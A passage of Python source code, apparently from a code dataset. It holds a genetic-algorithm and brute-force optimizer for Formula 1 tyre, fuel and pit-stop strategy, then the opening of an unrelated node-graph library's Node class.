\r\n ### If weather is not completely Dry the constraint of changing tyre does not apply anymore\r\n if last_lap_fuel_load >= 0:\r\n strategy['Valid'] = True\r\n return True\r\n \r\n else:\r\n if len(all_compounds) > 1 and last_lap_fuel_load >= 0:\r\n strategy['Valid'] = True\r\n return True\r\n \r\n strategy['Valid'] = False \r\n return False\r\n\r\n\r\n # Selection step with dynamic penalty\r\n def selection_dynamic_penalty(self, step:int, population:list, threshold_quantile:float, best:int):\r\n deltas = [abs(x['TotalTime'] - best) for x in population]\r\n max_delta = max(1,max(deltas))\r\n\r\n alpha = np.exp(1+(1/self.iterations)*step)\r\n penalty = [(delta/max_delta)*alpha for delta in deltas]\r\n\r\n quantile = np.quantile(penalty, threshold_quantile)\r\n\r\n for p, pop in zip(penalty, population):\r\n if not pop['Valid']:\r\n if pop['NumPitStop'] < 1 and all([x == 'Dry' for x in pop['Weather']]):\r\n p *= alpha\r\n if p == 0.0:\r\n p = np.exp(alpha)\r\n last_lap_fuel_load = self.getFuelLoad(initial_fuel=pop['FuelLoad'][0], conditions=pop['Weather'])\r\n if last_lap_fuel_load < 0:\r\n last_lap_fuel_load = abs(last_lap_fuel_load)\r\n p *= np.exp(last_lap_fuel_load)\r\n if p == 0.0:\r\n p = np.exp(last_lap_fuel_load)\r\n \r\n for idx, x in enumerate(population):\r\n x['Penalty'] = penalty[idx]\r\n sortedPopulation = sorted(population, key=lambda x: x['Penalty'])\r\n selected = [x for _, x in enumerate(sortedPopulation) if x['Penalty'] < quantile]\r\n \r\n for x in selected:\r\n x.pop('Penalty')\r\n \r\n return selected\r\n \r\n\r\n # Total crossover step\r\n def crossover(self, p1:dict, p2:dict,):\r\n ### Children are copies of parents by default\r\n c1, c2 = copy.deepcopy(p1), copy.deepcopy(p2)\r\n\r\n ### Check for recombination\r\n if random.random() < self.mu:\r\n c1, c2 = self.crossover_fuel(c1, c2)\r\n \r\n return [c1,c2]\r\n\r\n\r\n # Crossover step on the fuel\r\n def crossover_fuel(self, p1:dict, p2:dict):\r\n fuelLoad_p1 = p1['FuelLoad'][0]\r\n fuelLoad_p2 = p2['FuelLoad'][0]\r\n\r\n p1['FuelLoad'][0] = fuelLoad_p2\r\n p2['FuelLoad'][0] = fuelLoad_p1\r\n\r\n \r\n for lap in range(1, self.numLaps):\r\n fuelLoad_p1 = self.getFuelLoad(initial_fuel=fuelLoad_p2, conditions=p1['Weather'][:lap+1])\r\n fuelLoad_p2 = self.getFuelLoad(initial_fuel=fuelLoad_p1, conditions=p2['Weather'][:lap+1])\r\n p1['FuelLoad'][lap] = fuelLoad_p2\r\n p2['FuelLoad'][lap] = fuelLoad_p1\r\n \r\n return self.correct_strategy(p1), self.correct_strategy(p2)\r\n\r\n\r\n # Function to correct a strategy\r\n def correct_strategy(self, strategy:dict, index:int=0):\r\n initialFuelLoad = round(strategy['FuelLoad'][0],2)\r\n strategy['FuelLoad'][0] = initialFuelLoad\r\n tyre = strategy['TyreCompound'][0]\r\n strategy['LapTime'][0] = self.getLapTime(compound=tyre, compoundAge=0, lap=0, fuel_load=initialFuelLoad, conditions=strategy['Weather'][:1], drs=False, pitStop=strategy['PitStop'][0])\r\n pitStopCounter = 0\r\n \r\n if index != 0 and index != self.numLaps:\r\n compound = strategy['TyreCompound'][index-1]\r\n tyre_age = strategy['TyreAge'][index-1]\r\n while index < self.numLaps and strategy['PitStop'][index] == False:\r\n tyre_age += 1\r\n strategy['TyreAge'][index] = tyre_age\r\n strategy['TyreCompound'][index] = compound\r\n strategy['TyreWear'][index] = self.getTyreWear(strategy['TyreCompound'][index], strategy['TyreAge'][index])\r\n strategy['LapTime'][index] = self.getLapTime(strategy['TyreCompound'][index], strategy['TyreAge'][index], index, strategy['FuelLoad'][index], strategy['Weather'][:index+1], False, False)\r\n index += 1\r\n\r\n strategy['NumPitStop'] = sum([x for x in strategy['PitStop'] if x])\r\n strategy['TotalTime'] = sum(strategy['LapTime'])\r\n\r\n return strategy\r\n\r\n for lap in range(1, self.numLaps):\r\n weather = strategy['Weather'][:lap+1]\r\n\r\n ### FuelLoad keeps the same, it just needs to be corrected if changed\r\n fuelLoad = self.getFuelLoad(initial_fuel=initialFuelLoad, conditions=weather)\r\n strategy['FuelLoad'][lap] = fuelLoad\r\n\r\n ### Get if a pitstop is made and compound lap'\r\n pitStop = strategy['PitStop'][lap]\r\n old_compound = strategy['TyreCompound'][lap-1]\r\n compound = strategy['TyreCompound'][lap]\r\n tyresAge = strategy['TyreAge'][lap-1]\r\n \r\n ### We have two options: either there is a pitstop or the compound has changes, if so we have to recalculate all\r\n if pitStop or old_compound != compound or any([x >= 0.8 for x in strategy['TyreWear'][lap-1].values()]):\r\n tyresAge = 0\r\n pitStop = True\r\n pitStopCounter += 1\r\n else:\r\n tyresAge += 1\r\n \r\n tyreWear = self.getTyreWear(compound=compound, lap=tyresAge)\r\n timing = self.getLapTime(compound=compound, compoundAge=tyresAge, lap=lap, fuel_load=fuelLoad,conditions=weather, drs=False, pitStop=pitStop)\r\n strategy['PitStop'][lap] = pitStop\r\n strategy['TyreWear'][lap] = tyreWear\r\n strategy['TyreAge'][lap] = tyresAge\r\n strategy['LapTime'][lap] = timing\r\n\r\n strategy['NumPitStop'] = pitStopCounter\r\n strategy['TotalTime'] = sum(strategy['LapTime'])\r\n\r\n return strategy\r\n\r\n\r\n # Total function for the mutation step\r\n def mutation(self,child:dict) -> list:\r\n childAllMutated = copy.deepcopy(child)\r\n children = []\r\n\r\n if random.random() < self.sigma:\r\n children.append(self.mutation_compound(copy.deepcopy(child)))\r\n childAllMutated = self.mutation_compound(childAllMutated)\r\n \r\n if random.random() < self.sigma:\r\n children.append(self.mutation_pitstop(copy.deepcopy(child)))\r\n children.append(self.mutation_pitstop_add(copy.deepcopy(child)))\r\n \r\n childAllMutated = self.mutation_pitstop(childAllMutated)\r\n childAllMutated = self.mutation_pitstop_add(childAllMutated)\r\n\r\n if random.random() < self.sigma:\r\n children.append(self.mutation_fuel_load(copy.deepcopy(child)))\r\n childAllMutated = self.mutation_fuel_load(childAllMutated)\r\n \r\n children.append(childAllMutated)\r\n \r\n return children\r\n\r\n\r\n # Mutation step on the compound\r\n def mutation_compound(self, child:dict, ):\r\n usedTyres = dict()\r\n usedTyres[0] = child['TyreCompound'][0]\r\n for lap in range(1, self.numLaps):\r\n if child['TyreCompound'][lap] != child['TyreCompound'][lap - 1]:\r\n usedTyres[lap] = child['TyreCompound'][lap]\r\n\r\n lapRandom = random.randint(0, len(usedTyres)-1)\r\n \r\n lap = list(usedTyres.keys())[lapRandom]\r\n oldCompound = usedTyres[lap]\r\n\r\n compoundRandom = self.randomCompound()\r\n\r\n while oldCompound == compoundRandom:\r\n compoundRandom = self.randomCompound()\r\n \r\n child['TyreCompound'][lap] = compoundRandom\r\n\r\n for i in range(lap + 1, self.numLaps):\r\n if not child['PitStop'][lap]:\r\n child['TyreCompound'][i] = compoundRandom\r\n else:\r\n return self.correct_strategy(child)\r\n \r\n return self.correct_strategy(child)\r\n\r\n\r\n # Mutation step on the pitstop\r\n def mutation_pitstop(self,child:dict):\r\n childPitNum = child['NumPitStop'] \r\n\r\n ### Check if we cannot make different pitStops number\r\n if childPitNum < 1:\r\n return self.randomChild()\r\n \r\n ### There should be at least 1 pitstop\r\n if childPitNum == 1: \r\n return child\r\n \r\n numRandomPitStop = random.randint(1,childPitNum)\r\n numPitStops = 0\r\n index = -1\r\n for lap in range(0, self.numLaps):\r\n if child['PitStop'][lap] == True:\r\n numPitStops +=1\r\n if numPitStops == numRandomPitStop:\r\n child['PitStop'][lap] = False\r\n child['NumPitStop'] -= 1\r\n index = lap\r\n\r\n return self.correct_strategy(child, index)\r\n\r\n\r\n # Mutation step for adding a pitstop\r\n def mutation_pitstop_add(self, child:dict):\r\n random_lap = random.randint(1, self.numLaps-1)\r\n\r\n while child['PitStop'][random_lap] == True:\r\n random_lap = random.randint(1, self.numLaps-1)\r\n \r\n compound = self.randomCompound()\r\n \r\n tyre_age = 0\r\n child['PitStop'][random_lap] = True\r\n child['TyreAge'][random_lap] = tyre_age\r\n child['TyreWear'][random_lap] = self.getTyreWear(compound=compound, lap=tyre_age)\r\n child['TyreCompound'][random_lap] = compound\r\n child['LapTime'][random_lap] = self.getLapTime(compound=compound, compoundAge=tyre_age, lap=random_lap, fuel_load=child['FuelLoad'][random_lap], conditions=child['Weather'][:random_lap] if random_lap != 0 else child['Weather'][:random_lap], drs=False, pitStop=child['PitStop'][random_lap])\r\n child['NumPitStop'] += 1\r\n remaining = random_lap + 1\r\n tyre_age += 1\r\n while remaining < self.numLaps and child['PitStop'][remaining] == False:\r\n child['TyreWear'][remaining] = self.getTyreWear(compound=compound, lap=tyre_age)\r\n child['TyreCompound'][remaining] = compound\r\n child['TyreAge'][remaining] = tyre_age\r\n child['LapTime'][remaining] = self.getLapTime(compound=compound, compoundAge=tyre_age, lap=remaining, fuel_load=child['FuelLoad'][remaining], conditions=child['Weather'][:remaining+1], drs=False, pitStop=child['PitStop'][remaining])\r\n remaining += 1\r\n tyre_age += 1\r\n child['TotalTime'] = sum(child['LapTime'])\r\n \r\n return child\r\n \r\n\r\n # Mutation step on the fuel\r\n def mutation_fuel_load(self, child:dict, ):\r\n new_fuel = child['FuelLoad'][0]+random.uniform(-10,10)\r\n\r\n child['FuelLoad'][0] = new_fuel\r\n child['LapTime'][0] = self.getLapTime(compound=child['TyreCompound'][0], compoundAge=child['TyreAge'][0], lap=0, fuel_load=new_fuel, conditions=child['Weather'][:1], drs=False, pitStop=child['PitStop'][0])\r\n \r\n for lap in range(1,self.numLaps):\r\n fuel = self.getFuelLoad(initial_fuel=new_fuel, conditions=child['Weather'][:lap+1])\r\n timing = self.getLapTime(compound=child['TyreCompound'][lap], compoundAge=child['TyreAge'][lap], lap=lap, fuel_load=fuel, conditions=child['Weather'][:lap+1], drs=False, pitStop=child['PitStop'][lap])\r\n \r\n child['FuelLoad'][lap] = fuel\r\n child['LapTime'][lap] = timing\r\n\r\n child['TotalTime'] = sum(child['LapTime'])\r\n return child\r\n\r\n\r\n \"\"\"\r\n Bruteforce algorithm\r\n \"\"\"\r\n # Function to build the tree of the bruteforce algorithm\r\n def build_tree(self, temp_tree:list, tyres_age:int, lap:int):\r\n global BEST_TIME\r\n global STRATEGY\r\n\r\n weather = self.weather.get_weather_percentage_list()\r\n total_time = sum([x['LapTime'] for x in temp_tree])\r\n pitStop_count = sum([x['PitStop'] for x in temp_tree])\r\n initial_fuel = temp_tree[0]['FuelLoad']\r\n compound_set = set([x['Compound'] for x in temp_tree])\r\n\r\n if total_time > BEST_TIME or pitStop_count > 2:\r\n return {'Strategy':None, 'TotalTime':np.inf}\r\n\r\n if any([x >= 0.8 for x in temp_tree[-1]['TyreWear'].values()]):\r\n return {'Strategy':None, 'TotalTime':np.inf}\r\n\r\n if lap == self.numLaps:\r\n if total_time < BEST_TIME:\r\n if len(compound_set) > 1:\r\n BEST_TIME = total_time\r\n STRATEGY = copy.deepcopy(temp_tree)\r\n return {'Strategy':copy.deepcopy(temp_tree), 'TotalTime':total_time}\r\n \r\n return {'Strategy':None, 'TotalTime':np.inf}\r\n \r\n fuel_load = self.getFuelLoad(initial_fuel,weather[:lap+1])\r\n w = weather[lap]\r\n\r\n if w < 20:\r\n idx = 1\r\n values = {1:None, 2:None, 3:None, 4:None}\r\n for compound in ['Soft', 'Medium','Hard']:\r\n if compound == temp_tree[-1]['Compound']:\r\n for pitStop in [True,False]:\r\n node = {'Compound':compound, 'TyreWear': self.getTyreWear(compound, tyres_age+1 if not pitStop else 0), 'TyreAge':tyres_age+1 if not pitStop else 0, 'FuelLoad':fuel_load, 'PitStop':pitStop, 'LapTime': self.getLapTime(compound=compound, compoundAge=tyres_age+1 if not pitStop else 0, lap=lap, fuel_load=fuel_load, conditions=weather[:lap+1], drs=False, pitStop=pitStop)}\r\n temp_tree.append(node)\r\n values[idx] = self.build_tree(temp_tree, tyres_age+1 if not pitStop else 0, lap+1)\r\n temp_tree.pop()\r\n idx+=1\r\n else:\r\n pitStop = True\r\n node = {'Compound':compound, 'TyreWear': self.getTyreWear(compound, tyres_age+1 if not pitStop else 0), 'TyreAge':tyres_age+1 if not pitStop else 0, 'FuelLoad':fuel_load, 'PitStop':pitStop, 'LapTime': self.getLapTime(compound=compound, compoundAge=tyres_age+1 if not pitStop else 0, lap=lap, fuel_load=fuel_load, conditions=weather[:lap+1], drs=False, pitStop=pitStop)}\r\n temp_tree.append(node)\r\n values[idx] = self.build_tree(temp_tree, tyres_age+1 if not pitStop else 0, lap+1)\r\n temp_tree.pop()\r\n idx+=1\r\n elif w > 50 and w < 80:\r\n values = {1:None}\r\n idx = 1\r\n compound = 'Inter'\r\n if compound == temp_tree[-1]['Compound']:\r\n for pitStop in [True,False]:\r\n node = {'Compound':compound, 'TyreWear': self.getTyreWear(compound, tyres_age+1 if not pitStop else 0), 'TyreAge':tyres_age+1 if not pitStop else 0, 'FuelLoad':fuel_load, 'PitStop':pitStop, 'LapTime': self.getLapTime(compound=compound, compoundAge=tyres_age+1 if not pitStop else 0, lap=lap, fuel_load=fuel_load, conditions=weather[:lap+1], drs=False, pitStop=pitStop)}\r\n temp_tree.append(node)\r\n values[idx] = self.build_tree(temp_tree, tyres_age+1 if not pitStop else 0, lap+1)\r\n temp_tree.pop()\r\n else:\r\n pitStop = True\r\n node = {'Compound':compound, 'TyreWear': self.getTyreWear(compound, tyres_age+1 if not pitStop else 0), 'TyreAge':tyres_age+1 if not pitStop else 0, 'FuelLoad':fuel_load, 'PitStop':pitStop, 'LapTime': self.getLapTime(compound=compound, compoundAge=tyres_age+1 if not pitStop else 0, lap=lap, fuel_load=fuel_load, conditions=weather[:lap+1], drs=False, pitStop=pitStop)}\r\n temp_tree.append(node)\r\n values[idx] = self.build_tree(temp_tree, tyres_age+1 if not pitStop else 0, lap+1)\r\n temp_tree.pop()\r\n elif w > 80:\r\n values = {1:None}\r\n idx = 1\r\n compound = 'Wet'\r\n if compound == temp_tree[-1]['Compound']:\r\n for pitStop in [True,False]:\r\n node = {'Compound':compound, 'TyreWear': self.getTyreWear(compound, tyres_age+1 if not pitStop else 0), 'TyreAge':tyres_age+1 if not pitStop else 0, 'FuelLoad':fuel_load, 'PitStop':pitStop, 'LapTime': self.getLapTime(compound=compound, compoundAge=tyres_age+1 if not pitStop else 0, lap=lap, fuel_load=fuel_load, conditions=weather[:lap+1], drs=False, pitStop=pitStop)}\r\n temp_tree.append(node)\r\n values[idx] = self.build_tree(temp_tree, tyres_age+1 if not pitStop else 0, lap+1)\r\n temp_tree.pop()\r\n else:\r\n pitStop = True\r\n node = {'Compound':compound, 'TyreWear': self.getTyreWear(compound, tyres_age+1 if not pitStop else 0), 'TyreAge':tyres_age+1 if not pitStop else 0, 'FuelLoad':fuel_load, 'PitStop':pitStop, 'LapTime': self.getLapTime(compound=compound, compoundAge=tyres_age+1 if not pitStop else 0, lap=lap, fuel_load=fuel_load, conditions=weather[:lap+1], drs=False, pitStop=pitStop)}\r\n temp_tree.append(node)\r\n values[idx] = self.build_tree(temp_tree, tyres_age+1 if not pitStop else 0, lap+1)\r\n temp_tree.pop()\r\n else:\r\n values = {1:None, 2:None, 3:None, 4:None}\r\n idx = 1\r\n for compound in ['Inter','Soft', 'Medium','Hard']:\r\n if compound == temp_tree[-1]['Compound']:\r\n for pitStop in [True,False]:\r\n node = {'Compound':compound, 'TyreWear': self.getTyreWear(compound, tyres_age+1 if not pitStop else 0), 'TyreAge':tyres_age+1 if not pitStop else 0, 'FuelLoad':fuel_load, 'PitStop':pitStop, 'LapTime': self.getLapTime(compound=compound, compoundAge=tyres_age+1 if not pitStop else 0, lap=lap, fuel_load=fuel_load, conditions=weather[:lap+1], drs=False, pitStop=pitStop)}\r\n temp_tree.append(node)\r\n values[idx] = self.build_tree(temp_tree, tyres_age+1 if not pitStop else 0, lap+1)\r\n temp_tree.pop()\r\n idx+=1\r\n else:\r\n pitStop = True\r\n node = {'Compound':compound, 'TyreWear': self.getTyreWear(compound, tyres_age+1 if not pitStop else 0), 'TyreAge':tyres_age+1 if not pitStop else 0, 'FuelLoad':fuel_load, 'PitStop':pitStop, 'LapTime': self.getLapTime(compound=compound, compoundAge=tyres_age+1 if not pitStop else 0, lap=lap, fuel_load=fuel_load, conditions=weather[:lap+1], drs=False, pitStop=pitStop)}\r\n temp_tree.append(node)\r\n values[idx] = self.build_tree(temp_tree, tyres_age+1 if not pitStop else 0, lap+1)\r\n temp_tree.pop()\r\n idx+=1\r\n\r\n ### Best Strategy\r\n to_remove = list()\r\n for key, val in values.items():\r\n if val is None:\r\n to_remove.append(key)\r\n for key in to_remove:\r\n values.pop(key)\r\n for val in values.values():\r\n if val['Strategy'] is not None:\r\n if len(val['Strategy']) < self.numLaps:\r\n val['TotalTime'] = np.inf\r\n best_strategy = min(values, key=lambda x: values[x]['TotalTime'])\r\n\r\n\r\n return {'Strategy':copy.deepcopy(values[best_strategy]['Strategy']), 'TotalTime':values[best_strategy]['TotalTime']}\r\n\r\n\r\n # Function to get the result of the bruteforce algorithm\r\n def lower_bound(self,):\r\n ### Build the solution space as a tree\r\n temp_tree = []\r\n weather = self.weather.get_weather_percentage_list()\r\n initial_fuel = self.getInitialFuelLoad(weather)\r\n timer_start = time.time()\r\n w = weather[0]\r\n\r\n if w < 20:\r\n values = {1:None, 2:None, 3:None}\r\n \r\n ### Soft\r\n soft_timer = time.time()\r\n compound = 'Soft'\r\n print(f\"[BruteForce] Computations starting with {compound}...\")\r\n temp_tree.append({'Compound':compound, 'TyreWear': self.getTyreWear(compound, 0), 'TyreAge':0, 'FuelLoad':initial_fuel, 'PitStop':False, 'LapTime': self.getLapTime(compound=compound, compoundAge=0, lap=0, fuel_load=initial_fuel, conditions=[weather[0]], drs=False, pitStop=False)})\r\n values[1] = self.build_tree(temp_tree, 0, 1)\r\n temp_tree.pop()\r\n soft_timer = ms_to_time(round(1000*(time.time() - soft_timer)))\r\n print(f\"\\033[A\\033[K[BruteForce] {compound} computed in {soft_timer}\")\r\n\r\n ### Medium\r\n medium_timer = time.time()\r\n compound = 'Medium'\r\n print(f\"[BruteForce] Computations starting with {compound}...\")\r\n temp_tree.append({'Compound':compound, 'TyreWear': self.getTyreWear(compound, 0), 'TyreAge':0, 'FuelLoad':initial_fuel, 'PitStop':False, 'LapTime': self.getLapTime(compound=compound, compoundAge=0, lap=0, fuel_load=initial_fuel, conditions=[weather[0]], drs=False, pitStop=False)})\r\n values[2] = self.build_tree(temp_tree, 0, 1)\r\n temp_tree.pop()\r\n medium_timer = ms_to_time(round(1000*(time.time() - medium_timer)))\r\n print(f\"\\033[A\\033[K[BruteForce] {compound} computed in {medium_timer}\")\r\n\r\n ### Hard\r\n hard_timer = time.time()\r\n compound = 'Hard'\r\n print(f\"[BruteForce] Computations starting with {compound}...\")\r\n temp_tree.append({'Compound':compound, 'TyreWear': self.getTyreWear(compound, 0), 'TyreAge':0, 'FuelLoad':initial_fuel, 'PitStop':False, 'LapTime': self.getLapTime(compound=compound, compoundAge=0, lap=0, fuel_load=initial_fuel, conditions=[weather[0]], drs=False, pitStop=False)})\r\n values[3] = self.build_tree(temp_tree, 0, 1)\r\n temp_tree.pop()\r\n hard_timer = ms_to_time(round(1000*(time.time() - hard_timer)))\r\n print(f\"\\033[A\\033[K[BruteForce] {compound} computed in {hard_timer}\")\r\n elif w > 50 and w < 80:\r\n values = {1:None}\r\n ### Inter\r\n inter_timer = time.time()\r\n compound = 'Inter'\r\n print(f\"[BruteForce] Computations starting with {compound}...\")\r\n temp_tree.append({'Compound':compound, 'TyreWear': self.getTyreWear(compound, 0), 'TyreAge':0, 'FuelLoad':initial_fuel, 'PitStop':False, 'LapTime': self.getLapTime(compound=compound, compoundAge=0, lap=0, fuel_load=initial_fuel, conditions=[weather[0]], drs=False, pitStop=False)})\r\n values[1] = self.build_tree(temp_tree, 0, 1)\r\n temp_tree.pop()\r\n inter_timer = ms_to_time(round(1000*(time.time() - inter_timer)))\r\n print(f\"\\033[A\\033[K[BruteForce] {compound} computed in {inter_timer}\")\r\n elif w > 80:\r\n values = {1:None}\r\n\r\n ### Wet\r\n wet_timer = time.time()\r\n compound = 'Wet'\r\n print(f\"[BruteForce] Computations starting with {compound}...\")\r\n temp_tree.append({'Compound':compound, 'TyreWear': self.getTyreWear(compound, 0), 'TyreAge':0, 'FuelLoad':initial_fuel, 'PitStop':False, 'LapTime': self.getLapTime(compound=compound, compoundAge=0, lap=0, fuel_load=initial_fuel, conditions=[weather[0]], drs=False, pitStop=False)})\r\n values[1] = self.build_tree(temp_tree, 0, 1)\r\n temp_tree.pop()\r\n wet_timer = ms_to_time(round(1000*(time.time() - wet_timer)))\r\n print(f\"\\033[A\\033[K[BruteForce] {compound} computed in {wet_timer}\")\r\n else:\r\n values = {1:None, 2:None, 3:None, 4:None}\r\n \r\n ### Inter\r\n inter_timer = time.time()\r\n compound = 'Inter'\r\n print(f\"[BruteForce] Computations starting with {compound}...\")\r\n temp_tree.append({'Compound':compound, 'TyreWear': self.getTyreWear(compound, 0), 'TyreAge':0, 'FuelLoad':initial_fuel, 'PitStop':False, 'LapTime': self.getLapTime(compound=compound, compoundAge=0, lap=0, fuel_load=initial_fuel, conditions=[weather[0]], drs=False, pitStop=False)})\r\n values[1] = self.build_tree(temp_tree, 0, 1)\r\n temp_tree.pop()\r\n inter_timer = ms_to_time(round(1000*(time.time() - inter_timer)))\r\n print(f\"\\033[A\\033[K[BruteForce] {compound} computed in {inter_timer}\")\r\n\r\n ### Soft\r\n soft_timer = time.time()\r\n compound = 'Soft'\r\n print(f\"[BruteForce] Computations starting with {compound}...\")\r\n temp_tree.append({'Compound':compound, 'TyreWear': self.getTyreWear(compound, 0), 'TyreAge':0, 'FuelLoad':initial_fuel, 'PitStop':False, 'LapTime': self.getLapTime(compound=compound, compoundAge=0, lap=0, fuel_load=initial_fuel, conditions=[weather[0]], drs=False, pitStop=False)})\r\n values[2] = self.build_tree(temp_tree, 0, 1)\r\n temp_tree.pop()\r\n soft_timer = ms_to_time(round(1000*(time.time() - soft_timer)))\r\n print(f\"\\033[A\\033[K[BruteForce] {compound} computed in {soft_timer}\")\r\n\r\n ### Medium\r\n medium_timer = time.time()\r\n compound = 'Medium'\r\n print(f\"[BruteForce] Computations starting with {compound}...\")\r\n temp_tree.append({'Compound':compound, 'TyreWear': self.getTyreWear(compound, 0), 'TyreAge':0, 'FuelLoad':initial_fuel, 'PitStop':False, 'LapTime': self.getLapTime(compound=compound, compoundAge=0, lap=0, fuel_load=initial_fuel, conditions=[weather[0]], drs=False, pitStop=False)})\r\n values[3] = self.build_tree(temp_tree, 0, 1)\r\n temp_tree.pop()\r\n medium_timer = ms_to_time(round(1000*(time.time() - medium_timer)))\r\n print(f\"\\033[A\\033[K[BruteForce] {compound} computed in {medium_timer}\")\r\n\r\n ### Hard\r\n hard_timer = time.time()\r\n compound = 'Hard'\r\n print(f\"[BruteForce] Computations starting with {compound}...\")\r\n temp_tree.append({'Compound':compound, 'TyreWear': self.getTyreWear(compound, 0), 'TyreAge':0, 'FuelLoad':initial_fuel, 'PitStop':False, 'LapTime': self.getLapTime(compound=compound, compoundAge=0, lap=0, fuel_load=initial_fuel, conditions=[weather[0]], drs=False, pitStop=False)})\r\n values[4] = self.build_tree(temp_tree, 0, 1)\r\n temp_tree.pop()\r\n hard_timer = ms_to_time(round(1000*(time.time() - hard_timer)))\r\n print(f\"\\033[A\\033[K[BruteForce] {compound} computed in {hard_timer}\")\r\n\r\n ### Best Strategy\r\n best_strategy_index = min(values, key=lambda x: values[x]['TotalTime'])\r\n best_strategy, best_laptime = values[best_strategy_index]['Strategy'], values[best_strategy_index]['TotalTime']\r\n\r\n if best_strategy is None:\r\n print(f\"Strategy is none...\")\r\n exit(-1)\r\n\r\n for lap, strategy in enumerate(best_strategy):\r\n print(f\"Lap {lap+1} -> Compound '{strategy['Compound']}', TyresAge {strategy['TyreAge']}, Wear '{round(strategy['TyreWear']['FL']*100,1)}'% | '{round(strategy['TyreWear']['FR']*100,1)}'% | '{round(strategy['TyreWear']['RL']*100,1)}'% | '{round(strategy['TyreWear']['RR']*100,1)}'%, Fuel '{round(strategy['FuelLoad'],2)}' Kg, PitStop '{'Yes' if strategy['PitStop'] else 'No'}', Time '{ms_to_time(strategy['LapTime'])}' ms\")\r\n print(f\"Computed in time {ms_to_time(round(1000*(time.time()-timer_start)))}\")\r\n print(f\"Total time {ms_to_time(best_laptime)}\")\r\n\r\n ### Find the best solution\r\n return best_strategy, best_laptime\r\n \r\n\r\n # Function to get the initial fuel load \r\n def getInitialFuelLoad(self, conditions:list):\r\n weather = [self.weather.get_weather_string(c) for c in conditions[:-1]]\r\n return round(self.car.predict_starting_fuel(weather), 2)","repo_name":"bonom/Evolutionary-F1-Race-Strategy","sub_path":"classes/Genetic.py","file_name":"Genetic.py","file_ext":"py","file_size_in_byte":41981,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"40872218460","text":"# -*- coding: utf-8 -*-\n\nimport json\nfrom pyNodeGraph.module.sqt import *\nfrom pyNodeGraph.ui.graph.const import *\nfrom pyNodeGraph.core.parameter import (\n Parameter, StringParameter, TextParameter, FloatParameter, BoolParameter, Color4fParameter, IntParameter\n)\nfrom pyNodeGraph.utils.log import get_logger\nfrom pyNodeGraph.utils.const import INPUT_ATTRIBUTE_PREFIX, OUTPUT_ATTRIBUTE_PREFIX\nfrom pyNodeGraph.core.state.core import GraphState\n\nlogger = get_logger('pyNodeGraph.node')\n\n\nclass NodeTypes(object):\n def __init__(self, nodeClass):\n self.nodeClass = nodeClass\n self.parentNodeClass = [n for n in nodeClass.__mro__ if hasattr(n, 'nodeType')]\n self.parentNodeTypes = [n.nodeType for n in self.parentNodeClass]\n\n def isSubType(self, nodeType):\n return nodeType in self.parentNodeTypes\n\n\nclass Node(QtCore.QObject):\n parameterValueChanged = QtCore.Signal(object)\n parameterAdded = QtCore.Signal(object)\n parameterRemoved = QtCore.Signal(object)\n parameterPagesCleared = QtCore.Signal()\n\n _nodeTypes = {}\n\n nodeType = 'Node'\n nodeItemType = 'NodeItem'\n nodeGroup = 'Other'\n\n fillNormalColor = (50, 60, 70)\n fillHighlightColor = (230, 230, 100)\n borderNormalColor = (50, 60, 70)\n borderHighlightColor = (180, 180, 250)\n\n _expressionMap = {}\n\n @classmethod\n def convertColorToFloat(cls, color):\n return [i / 255.0 for i in color]\n\n @classmethod\n def convertColorTo255(cls, color):\n return [max(min(i * 255.0, 255.0), 0) for i in color]\n\n @classmethod\n def registerExpressionString(cls, string, object):\n cls._expressionMap[string] = object\n\n @classmethod\n def registerNode(cls, nodeObjectClass):\n nodeType = nodeObjectClass.nodeType\n cls._nodeTypes[nodeType] = nodeObjectClass\n nodeObjectClass.parameterDefaults = {}\n\n @classmethod\n def setParamDefault(cls, nodeType, paramName, value):\n nodeClass = cls._nodeTypes.get(nodeType)\n if nodeClass is not None:\n nodeClass.setParameterDefault(paramName, value)\n\n @classmethod\n def getAllNodeClassNames(cls):\n return list(cls._nodeTypes.keys())\n\n @classmethod\n def getAllNodeClass(cls):\n return list(cls._nodeTypes.values())\n\n @classmethod\n def setParameterDefault(cls, parameterName, value):\n cls.parameterDefaults.update({parameterName: value})\n\n @classmethod\n def getNodeClass(cls, nodeType):\n return cls._nodeTypes.get(nodeType, cls)\n\n @classmethod\n def getNodesByGroup(cls):\n result = {}\n for k, v in cls._nodeTypes.items():\n if v.nodeGroup not in result:\n result[v.nodeGroup] = []\n result[v.nodeGroup].append(v)\n return result\n\n @classmethod\n def Class(cls):\n return cls.nodeType\n\n @classmethod\n def NodeTypes(cls):\n return NodeTypes(cls)\n\n def __init__(self, item=None, name=''):\n super(Node, self).__init__()\n\n self.item = item\n self._name = name\n self._parameters = {}\n self._parametersName = []\n self._updateToDated = False\n self._metadata = {}\n self._defaultMetadata = {}\n\n self._beforeInitParameters()\n self._initParameters()\n self._initDefaults()\n self._setTags()\n\n def _beforeInitParameters(self):\n pass\n\n def _initParameters(self):\n self._parameters = {\n 'name': StringParameter(name='name', default=self._name, parent=self, builtIn=True, hints={'tab': 'None'}),\n 'label': TextParameter(name='label', default='', parent=self, builtIn=True, hints={'tab': 'Node'}),\n 'labelFontSize': IntParameter(name='labelFontSize', default=10, parent=self, builtIn=True, hints={'tab': 'Node'}),\n 'x': FloatParameter(name='x', default=None, parent=self, builtIn=True, visible=False, hints={'tab': 'Node'}),\n 'y': FloatParameter(name='y', default=None, parent=self, builtIn=True, visible=False, hints={'tab': 'Node'}),\n 'locked': BoolParameter(name='locked', default=False, parent=self, builtIn=True, visible=False, hints={'tab': 'Node'}),\n 'disable': BoolParameter(name='disable', default=0, parent=self, builtIn=True, hints={'tab': 'Node'}),\n 'fillColor': Color4fParameter(name='fillColor', parent=self, builtIn=True, hints={'showEditor': 'False', 'tab': 'None'}, default=self.convertColorToFloat(self.fillNormalColor)),\n 'borderColor': Color4fParameter(name='borderColor', parent=self, builtIn=True, hints={'showEditor': 'False', 'tab': 'None'}, default=self.convertColorToFloat(self.borderNormalColor)),\n }\n self._parametersName = list(self._parameters.keys())\n self._parametersName.sort()\n\n def _initDefaults(self):\n for name in self.parameterDefaults.keys():\n defaultValue = self.parameterDefaults.get(name)\n self.parameter(name).setValueQuietly(defaultValue, override=False)\n self.parameter(name).setInheritValue(defaultValue)\n\n def _setTags(self):\n pass\n\n def parameter(self, parameterName):\n return self._parameters.get(parameterName)\n\n def hasParameter(self, name):\n return name in self._parameters\n\n def parameters(self):\n return [self._parameters.get(n) for n in self._parametersName]\n\n def name(self):\n return self.parameter('name').getValue()\n\n def 